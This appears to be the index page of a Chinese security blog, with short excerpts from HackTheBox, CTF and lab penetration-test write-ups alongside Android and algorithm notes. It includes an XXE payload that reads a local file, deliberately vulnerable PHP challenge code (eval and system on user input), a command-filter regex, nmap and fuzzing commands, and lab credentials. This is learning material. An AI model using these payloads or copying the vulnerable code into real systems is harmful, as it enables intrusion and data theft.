INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 17S

导入到bloodhoundGUI里面进行分析

HTB-Administrator

Thu, 05 Dec 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich

Nmap

┌──(root㉿kali)-[/home/kali/Administrator]
└─# nmap -sSCV -Pn administrator.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-05 15:51 CST
Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.072s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-05 14:37:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h46m00s
| smb2-time: 
|   date: 2024-12-05T14:37:51
|_  start_date: N/A

Crackmapexec

通过SMB服务，获取到了当前存在的用户信息

HTB-Vintage

Tue, 03 Dec 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Hard

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following account: P.Rosa / Rosaisbest123

Nmap Scan

└─# nmap  -sC -sV -T4 -Pn  vintage.htb -p-

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-04 01:49:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  unknown
49668/tcp open  unknown
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49681/tcp open  unknown
50907/tcp open  unknown
65103/tcp open  unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -13m55s
| smb2-time: 
|   date: 2024-12-04T01:49:48
|_  start_date: N/A

发现在3269端口这一行，存在一个名为：DC01 的域控主机，添加到/etc/hosts中

WuCup-2024

Sun, 01 Dec 2024 00:00:00 +0000

Web

Sign

题目介绍: POST浅浅签个到吧

HelloHacker

题目介绍: 你看到的不一定是真的

源码如下

<?php
highlight_file(__FILE__);
error_reporting(0);
include_once 'check.php';
include_once 'ban.php';

$incompetent = $_POST['incompetent'];
$WuCup = $_POST['WuCup'];

if ($incompetent !== 'HelloHacker') {
    die('Come invade!');
}

$required_chars = ['p', 'e', 'v', 'a', 'n', 'x', 'r', 'o', 'z'];
$is_valid = true;

if (!checkRequiredChars($WuCup, $required_chars)) {
    $is_valid = false;
}

if ($is_valid) {

    $prohibited_file = 'prohibited.txt';
    if (file_exists($prohibited_file)) {
        $file = fopen($prohibited_file, 'r');
        
while ($line = fgets($file)) {
    $line = rtrim($line, "\r\n");  
    if ($line === '' && strpos($WuCup, ' ') === false) {
      
        continue;
    }
    if (stripos($WuCup, $line) !== false) {
        fclose($file);  
        die('this road is blocked');
    }
}
  fclose($file);  
    }

    eval($WuCup);
} else {
    die('NO！NO！NO！');
}

?>

简单分析一下，post的参数中incompetent是HelloHacker

HTB-Alert

Sat, 30 Nov 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap Scan

nmap alert.htb -sC -sV -T4 -Pn

开放端口：22、80，httpserver是Apache

进入80端口的网页，发现存在Markdown文件上传

HTB-Cap

Sun, 24 Nov 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

User.txt

进入网页，点击Security Snapshot，可以看到url进入到了/data/4，下面存在download路由，将其下载下来，并没有任何东西

SWPUCTF2023-Pwn

Sun, 24 Nov 2024 00:00:00 +0000

前言

之前学习过一段时间Pwn，后面就丢掉了，再重新回来补一补

签到

checksec检查一下

用64位IDA打开

简单的栈溢出，backdoor的位置直接给了

LitCTF-2023-Reverse

Sat, 23 Nov 2024 00:00:00 +0000

世界上最棒的程序员

Shift+F12，在全局字符串中查找到flag

ez_XOR

使用32位IDA打开，F5查看伪代码

可以看到存在字符串输入后进行异或，异或是可逆性的

SWPU-Misc

Thu, 21 Nov 2024 00:00:00 +0000

少年的ctf奇遇

考点：LSB隐写、图片宽高修改

题目描述：你说了图片里的一句话，老婆露出了这个表情。

LSB隐写原理

LSB即为最低有效位，图片中的图像像素一般是由RGB三原色（红绿蓝）组成

每一种颜色占用8位，取值范围为0x00~0xFF，即有256种颜色，一共包含了256的3次方的颜色

EP-Win8098

Sun, 17 Nov 2024 00:00:00 +0000

前言

本文是在攻破Windows Server 2016 DC的基础上对Windows PC 8089进行攻击

信息收集

回到WinServer 2016 DC的Meterpreter上，进入shell，如果使用了代理导致进不去，请参考前面几篇文章

EP-WinServerCA

Sun, 17 Nov 2024 00:00:00 +0000

前言

这个主机毫无新意，这篇文章我都不想写，攻破这个主机的方法和前面8089是一模一样

PTH攻击

按道理来说，拿下域控的Administrator之后，整个域基本上就可以打穿了。

EP-WinServerDC

Sat, 16 Nov 2024 00:00:00 +0000

前言

本文是在8086那篇文章已经搭建好代理的情况下进行的

漏洞扫描

利用web01上的fscan对DC主机进行扫描，发现疑似存在MS17-010漏洞

进入MSF，设置全局代理以及反向允许

EP-Win8086

Fri, 15 Nov 2024 00:00:00 +0000

前言

本文是在已经攻破EP-web01的基础上，对其内网中的Win8086进行攻击，最终获取到其权限

漏洞扫描

由于上篇文章已经可以远程登录Web01，这里直接上传fscan的windows版本，并且进行漏扫

EP-Web01

Tue, 12 Nov 2024 00:00:00 +0000

前言

该靶机是目标局域网内的入口机器，本文目的是拿到Web01的最高权限并且实现远程登录

信息收集

$ arp-scan -l

发现存在一台IP值为：192.168.237.139的主机

极客大挑战2024

Thu, 31 Oct 2024 00:00:00 +0000

100%的⚪

F12审计源码

Base64解密

baby_upload

%00截断，属于nginx解析问题，会把file.ext当作php文件解析

ez_http

HTB-Cicada

Mon, 30 Sep 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

Nmap Scan

发现靶机存在smb网络文件共享服务

使用smbclient连接，发现以下的目录

并且在HR的目录下发现了一个txt文件

HTB-Trickster

Sat, 28 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Git Hack

我在trickster的主域名发现了一个shop的子域名网站

这个shop看起来像是使用PrestaShop搭建，我搜索了一下相关的漏洞，无法直接使用

HTB-TowMillion

Sat, 21 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Nmap Scan

开放端口：22、80

并且注意到80端口上有一个重定向，添加到/etc/hosts

Register

注意到有/login路由，使用简单的密码组合登陆失败，猜测存在/register路由

HTB-Solarlab

Fri, 20 Sep 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Medium

Nmap Scan

开放端口：80、135、139、445

可以看到存在smb服务（SMB是一种网络文件共享协议）

尝试使用smbclient进行连接

HTB-Caption

Wed, 18 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Hard

Nmap Scan

开放端口：22、80、8080

caption.htb:80👇是一个登陆界面

caption.htb:8080👇注意到是一个Gitbucket的服务

HTB-Greenhorn

Tue, 17 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Nmap

Dirsearch

找到一些敏感文件

进入login.php，发现pluck的版本是4.7.18

CVE-2023-50564

查询相关漏洞之后，发现RCE需要先上传文件。

HTB-MonitorsThree

Thu, 12 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Basic Scan

Nmap

nmap -A -O monitorsthree.htb

开放端口：22、80、8084

Web server：nginx 1.18.0

Dirsearch

dirsearch -u monitorsthree.htb -t 50

发现：login.php

Subdomain Fuzzing

ffuf -w main.txt -u http://monitorsthree.htb -H "Host:FUZZ.monitorsthree.htb" -ac

HTB-Blurry

Wed, 11 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Basic Scan

Nmap

nmap -A -O blurry.htb

开放端口：22、80

Web Server：nginx 1.18.0

Dirsearch

Subdomain Fuzzing

子域名：app、files、chat

app.blurry.htb👇

HTB-Sightless

Tue, 10 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Nmap

nmap -A -O sightless.htb

开放端口：21、22、80

Web服务器：nginx 1.18.0

FTP服务器：ProFTPD

Dirsearch

dirsearch -u sightless.htb -t 50

Gobuster

gobuster dir -u http://sightless.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50

HTB-Mailing

Thu, 05 Sep 2024 00:00:00 +0000

Box Info

OS	Windows
Difficulty	Easy

Basic Scan

Nmap

nmap -A -O -Pn mailing.htb

开放端口：25、80、110、135、139、143、445、465、587、993

Server：hMailServer

HTB-BoardLight

Wed, 04 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Nmap

nmap -A -O boardlight.htb

开放端口：22、80

Server：Apache 2.4.41 (Ubuntu)

Dirsearch

dirsearch  -u boardlight.htb -t 50

Subdomain Fuzzing

在页尾发现一个：Board.htb

HTB-Editorial

Tue, 03 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Nmap

nmap -A -O editorial.htb

开放端口：**22**、**80**

Server：**nginx 1.18.0** （Ubuntu）

Dirsearch

dirsearch -u editorial.htb -t 50

HTB-PermX

Tue, 03 Sep 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Nmap

namp 10.10.11.23 -A -O

Opened Ports：22、80

Server：Apache 2.4.52 (Ubuntu)

Subdomain Fuzzing

Github：TheKingOfDuck/fuzzDicts: Web Pentesting (github.com)

ffuf -w main.txt -u http://permx.htb/ -H "Host:FUZZ.permx.htb" -mc 200

HTB-Compiled

Sat, 31 Aug 2024 00:00:00 +0000

Box Info

OS	Windows
Rated Difficulty	Medium

Port Scan

#linux
nmap -A -Pn 10.10.11.26

扫描出来3000和5000端口。

3000端口是一个类似于git的服务，具体是由Gitea驱动的。包含了注册、登录、创建仓库以及拉取代码等等功能。

HTB-Sea

Wed, 28 Aug 2024 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Easy

Basic Scan

Port & Dir scan

发现一个contact.php。进去看看

尝试抓包看看。并没有什么回显。

尝试扫描一下其他的目录。

Matrix-Breakout-2-Morpheus

Mon, 26 Aug 2024 00:00:00 +0000

前言

靶机来自Vulnerable By Design ~ VulnHub

下载链接：https://download.vulnhub.com/matrix-breakout/matrix-breakout-2-morpheus.ova

The Planets: Earth

Mon, 26 Aug 2024 00:00:00 +0000

前言

靶机来源：Vulnerable By Design ~ VulnHub

注意！！！！！！

本文内容纯属非预期，请不要在意本文内容。

正文

发现有http端口可以访问。直接访问是400报错。

进行更详细的扫描。可以发现编程语言用的是Python版本为3.9，Web服务器是Apache 2.4.51

MoeCTF 2024

Tue, 13 Aug 2024 00:00:00 +0000

一年一度的MoeCTF又来了，不过我好久没打过CTF了，前段时间一直在搞开发。

WEB

弗拉格之地的入口

直接进入 /robots.txt 发现 /webtutorEntry.php文件，进入即可拿到flag

Android-Compose中的基本布局

Fri, 12 Jul 2024 00:00:00 +0000

目标

构建一个健康应用，这款应用包含两个版块，一个列出了收藏合集，另一个列出了各种体育锻炼。具体如下图所示，包括竖屏和横屏的适配

主要内容

借助修饰符扩充可组合项

Android-状态交互-TipCalculate

Wed, 10 Jul 2024 00:00:00 +0000

前言

在上一篇摇骰子的文章里，在局部使用了remember multableStateof用于将变量存于内存之中，以便于状态变换。这篇文章的主要内容是设计一个简单的小费计算器，并且可以自定义选项。

Android-Compose初步-摇骰子

Tue, 09 Jul 2024 00:00:00 +0000

前言

最近在学习Android app开发，用的是Kotlin语言，然而B站上面的视频质量并不是很高，大多数都是对编程无基础人员的基本语法教学。相比之下，我觉得Android官方的Developer开发者课程是很不错的。此文章就是根据Android Developer中的创建交互式Dice Roller（摇骰子）部分进行学习记录，使用的是Jetpack compose的ui开发框架。

Windows-evtx分析

Mon, 08 Jul 2024 00:00:00 +0000

关于evtx

evtx文件是微软采用的一种全新的日志文件格式。在此之前的格式是 evt 。evtx由Windows事件查看器创建，包含Windows记录的事件列表，以专有的二进制XML格式保存。

等保-Linux等保测评

Sat, 06 Jul 2024 00:00:00 +0000

前言

环境来自于玄机edisec

题解

步骤一

1.查看相应文件，账户xiaoming的密码设定多久过期

linux chage命令简介：chage命令用于密码实效管理，该是用来修改帐号和密码的有效期限。

朵米客服平台

Sat, 15 Jun 2024 00:00:00 +0000

环境：极核::CTF (get-shell.com)

进入平台主页，点击免费使用，注册账号，登入后台

在左侧的广告设置一栏中，存在图片上传的点

这里可以先随意上传一个图片（要先打开burp suite的拦截，在点击上传

背景星空特效

Sun, 02 Jun 2024 00:00:00 +0000

本站使用的星空背景特效是用html5 canvas绘制而成

在Argon主题设置背景图片的代码里可以看到，背景图层的z-index是-2

这里只需要添加一个canvas画布，把z-index抬高一点，即可覆盖

LitCTF 2024

Sat, 01 Jun 2024 00:00:00 +0000

WEB

exx

这个标题以及整个界面，在NSS里面是做到过原题的，整体思路就是XXE

<?xml version="1.0" ?>
<!DOCTYPE note [
<!ENTITY hyh SYSTEM "file:///flag">
]>
<user>
<username>&hyh;</username>
<password>123456</password>
</user>

然后发包即可

SAS - Serializing Authentication System

base64加密之后传入参数即可

CTFshow-原谅杯

Sat, 23 Mar 2024 00:00:00 +0000

前言：练习题目，康复训练

原谅4

 <?php isset($_GET['xbx'])?system($_GET['xbx']):highlight_file(__FILE__);

题目给了这一段代码，但是经过测试，只有ls、rm、sh这三个命令能用

flag在根目录，没有直接读取文件的命令

但是这个sh命令是可以执行文件中的命令的，类似于下图

Pwn练习题

Tue, 05 Dec 2023 00:00:00 +0000

题目来源于NSSCTF网站

ret2text

[SWPUCTF 2021 新生赛]gift_pwn

先放到虚拟机里checksec一下，能看到开启NX，没有PIE，64位

放进64位的IDA反编译一下，可以看到在gift函数里留了后门

极客大挑战2023

Thu, 02 Nov 2023 00:00:00 +0000

前言

本校的极客大挑战还是要参加的，去年就很遗憾，今年得好好打一下，这次我会把能写的全写在博客里，同时也会学习一下其他的方向

组队的队友是外校大三的网工学长，很强的选手！

0xGame 2023

Sat, 07 Oct 2023 00:00:00 +0000

WEEK1

进去只有一个页面

源代码里没有东西，扫描后台也没有东西

放进火狐浏览器，F12进入调试器

在源码里发现flag

baby_php

源码如下

 <?php
// flag in flag.php
highlight_file(__FILE__);

if (isset($_GET['a']) && isset($_GET['b']) && isset($_POST['c']) && isset($_COOKIE['name'])) {
    $a = $_GET['a'];
    $b = $_GET['b'];
    $c = $_POST['c'];
    $name = $_COOKIE['name'];

    if ($a != $b && md5($a) == md5($b)) {
        if (!is_numeric($c) && $c != 1024 && intval($c) == 1024) {
            include($name.'.php');
        }
    }
}
?>

首先是a和b的MD5弱比较

SHCTF-2023

Mon, 02 Oct 2023 00:00:00 +0000

前言

写完week1感觉还是比较简单的，很基础

也是放假在家不想打游戏，拿这个消磨一下时间

WEEK1

babyRCE

题目源码

<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
            echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

过滤了部分命令和特殊符号

NewStarCTF-2023

Thu, 28 Sep 2023 00:00:00 +0000

Week1

泄漏的秘密

hint：粗心的网站管理员总会泄漏一些敏感信息在Web根目录下

访问该网站目录下的robots.txt可以找到第一部分的flag

扫描一下后台，发现www.zip备份文件，将其下载下来，在index.php中发现第二部分flag

MoeCTF-2023

Tue, 15 Aug 2023 00:00:00 +0000

前言

好久没玩CTF了，玩玩MoeCTF，就当是温故知新

西电的这个终端看起来好高级的样子

之前还没用过这种，长见识了

WEB

Web入门指北

DESCRIPTION: 解码获取flag

MS08-067漏洞测试

Thu, 10 Aug 2023 00:00:00 +0000

前言

本文纯属于“照虎画猫”

体验一下经典漏洞的复现过程

对测试过程进行简单的了解

MS08-067简介

MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”，攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote Procedure Call，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。

Java-反射

Thu, 27 Jul 2023 00:00:00 +0000

什么是反射？

在Java中，反射是指程序在运行时动态地获取类信息、构造对象、调用方法和访问属性的能力。

换句话说，反射使得程序可以在运行时检查和操作任意一个类的成员变量、方法和构造方法，而不需要在编译时就确定下来。

最短路径问题

Mon, 17 Jul 2023 00:00:00 +0000

在之前的文章写过两种搜索方式

深度优先搜索 and 广度优先搜索

然后用这两种搜索方式来解决了图的一些问题

这里学习几种新的算法

Floyd-Warshall

简单了解一下👇

介绍：Floyd-Warshall算法是有Floyd于1962年提出，其可以计算有向图中任意两点之间的最短路径，此算法利用动态规划的思想将计算的时间复杂度降低为 O(v^3) 【在这里我就简称 FW算法了😋

图的遍历

Sat, 15 Jul 2023 00:00:00 +0000

深度和广度优先是什么？

之前学习过深度和广度优先搜索

实际上深度和广度都是针对图的遍历而言的

什么是图？

请看下图，这是一个简单的有向图👇

下面是一个简单的无向图👇

简单的说，图就是由顶点和边组成的，在学离散数学的时候也涉及到了图论的相关知识

深度与广度搜索

Wed, 12 Jul 2023 00:00:00 +0000

前言

在说搜索方式之前

先讲一个简单的问题：求数的全排列

比如说，123 的全排列就是：123、132、213、231、312、321

这很简单吧

全排列的个数就是这个数的位数的阶乘，即 123 的全排列的个数是（ 3！=3×2×1）

栈、队列、链表

Mon, 10 Jul 2023 00:00:00 +0000

队列

队列的概念：只允许在一端进行插入数据操作，在另一端进行删除数据操作的特殊线性表

队列的两端：

队尾：进行插入操作的一端称为队尾
队头：进行删除操作的一端称为队头

几个简单的排序

Sun, 09 Jul 2023 00:00:00 +0000

从软工毕业学长那里淘来一本《啊哈！算法》

然后跟着这本书学习学习，记录一下

桶排序

在生活中会遇到一些排序问题，比如站队列的时候要按身高排序、考试的名次要按分数排序、网上购物有时会按价格排序……

CTFshow-月饼杯&吃瓜杯

Sun, 25 Jun 2023 00:00:00 +0000

日常练习题题目来源：ctf.show

月饼杯

Web1_此月圆

题目附件中有的index.php

<?php
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				include('flag.php');
				echo $flag;	
			}
			else
			{
				echo 'wrong password';
			}
		}
	}
function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里只能GET传入一个名为1的变量，password是已经设置好为1的

关于Nodejs原型链污染

Sat, 24 Jun 2023 00:00:00 +0000

继承与原型链

在JavaScript中只有一种结构：对象（连函数也是一种对象）。

每个对象都有一个_私有属性_，指向另一个名为“原型”（prototype）的对象。

浅谈Redis与SSRF

Mon, 19 Jun 2023 00:00:00 +0000

什么是Redis？

Redis是现在最受欢迎的NoSQL数据库之一，Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数据库。

HNCTF-2022

Sat, 17 Jun 2023 00:00:00 +0000

week1

2048

一个2048小游戏，先看看源码

在源码中看到游戏的js文件

找找看有没有flag

找到这一段代码

原来要超过20000分才弹出flag，这里直接把代码放到控制台运行，弹出flag

LitCTF-2023

Sat, 17 Jun 2023 00:00:00 +0000

我flag呢？

进去之后页面是这样

先看看网页源码呢

在注释里拿到flag

源码里也有一段彩蛋

导弹迷踪

进去之后好像是一个小游戏

先审查一下源码

在最下面看到Game files